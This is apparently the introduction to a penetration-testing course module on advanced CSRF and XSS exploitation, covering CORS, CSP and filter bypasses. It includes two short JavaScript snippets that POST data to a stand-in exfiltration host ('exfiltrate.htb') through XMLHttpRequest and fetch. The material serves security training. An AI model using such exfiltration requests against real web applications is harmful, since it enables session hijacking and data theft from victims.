Summary
This module focuses on identifying and exploiting CSRF and XSS vulnerabilities in modern web applications, delving into the intricacies of contemporary defense mechanisms and techniques to circumvent them. Specifically, we will craft potent XSS payloads to achieve engagement objectives, such as data exfiltration, victim impersonation, and execution of state-changing actions within a web application. Additionally, we will learn how to enumerate and exploit vulnerabilities in web applications within victims' internal networks.
In more detail, this module covers the following:
-
CSRF Exploitation:- What is the Same-Origin policy?
- What is Cross-Origin Resource Sharing (CORS)?
- Exploitation of CORS misconfigurations
- Bypassing weak CSRF defenses
-
Exploiting CSRF via XSS- Exfiltrating data from the victim's session
- Performing state-changing actions from the victim's session
- Enumerating internal web applications
- Exploiting internal web applications
- What is a Content-Security Policy (CSP)?
- Bypassing weak CSPs
- Bypassing weak XSS filters
This module is broken into sections with accompanying hands-on exercises to practice each of the tactics and techniques we cover. The module ends with a practical hands-on skills assessment to gauge your understanding of the various topic areas.
You can start and stop the module anytime and pick up where you left off. There is no time limit or "grading", but you must complete all of the exercises and the skills assessment to receive the maximum number of cubes and have this module marked as complete in any paths you have chosen.
As you work through the module, you will see example commands and command output for the various topics introduced. It is worth reproducing as many of these examples as possible to reinforce further the concepts presented in each section. You can do this in the PwnBox provided in the interactive sections or your virtual machine.
A firm grasp of the following modules can be considered a prerequisite for the successful completion of this module:
- Session Security
- Cross-Site Scripting (XSS)
Introduction to Advanced CSRF & XSS Exploitation
In this module, we will discuss the exploitation of Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) vulnerabilities in modern web applications, focusing on writing custom payloads to achieve specific objectives.
Proficiency in fundamental concepts of JavaScript, CSRF, XSS, and SQL injection vulnerabilities is a prerequisite for this module. Therefore, we recommend completing the Cross-Site Scripting (XSS), Session Security, and SQL Injection Fundamentals modules beforehand.
Modern CSRF and XSS Exploitation in the Real-World
As we will discuss in this module, many security policies and security measures in modern web browsers restrict or prevent the basic exploitation of CSRF vulnerabilities. For instance, there are the Same-Origin policy, Cross-Origin Resource Sharing (CORS), and SameSite cookies, which we will all explore further in the upcoming sections.
As such, the exploitation of plain CSRF vulnerabilities has become increasingly rare in the real world. However, if we discover an XSS vulnerability, we can combine the exploitation of XSS and CSRF, resulting in a powerful tool that enables us to attack the vulnerable web application itself and potentially additional web applications in the victim's internal network.
To exploit CSRF and XSS vulnerabilities and interact with the vulnerable web application, we can use the XMLHttpRequest object or the more modern Fetch API. We can use both to make HTTP requests from JavaScript code while specifying HTTP parameters like the method, HTTP headers, or the request body.
For instance, we can send a POST request using the XMLHttpRequest object by specifying the URL in the call to xhr.open, setting HTTP headers using the xhr.setRequestHeader function, and specifying request body parameters in the call to xhr.send:
var xhr = new XMLHttpRequest();
xhr.open('POST', 'http://exfiltrate.htb/', false);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('param1=hello¶m2=world');
On the other hand, we can send the same request using the Fetch API like so:
const response = await fetch('http://exfiltrate.htb/', {
method: "POST",
headers: {
'Content-Type': 'application/x-www-form-urlencoded'
},
body: 'param1=hello¶m2=world',
});
The function fetch expects the URL in the first parameter. We can pass all additional request parameters in an object in the second parameter.
Note: Like the whitebox penetration testing process, debugging and testing our XSS and CSRF exploits locally before sending them to victims is paramount; this ensures that during engagements, we avoid bugs that may lead to unintended behaviors, such as denial of service.
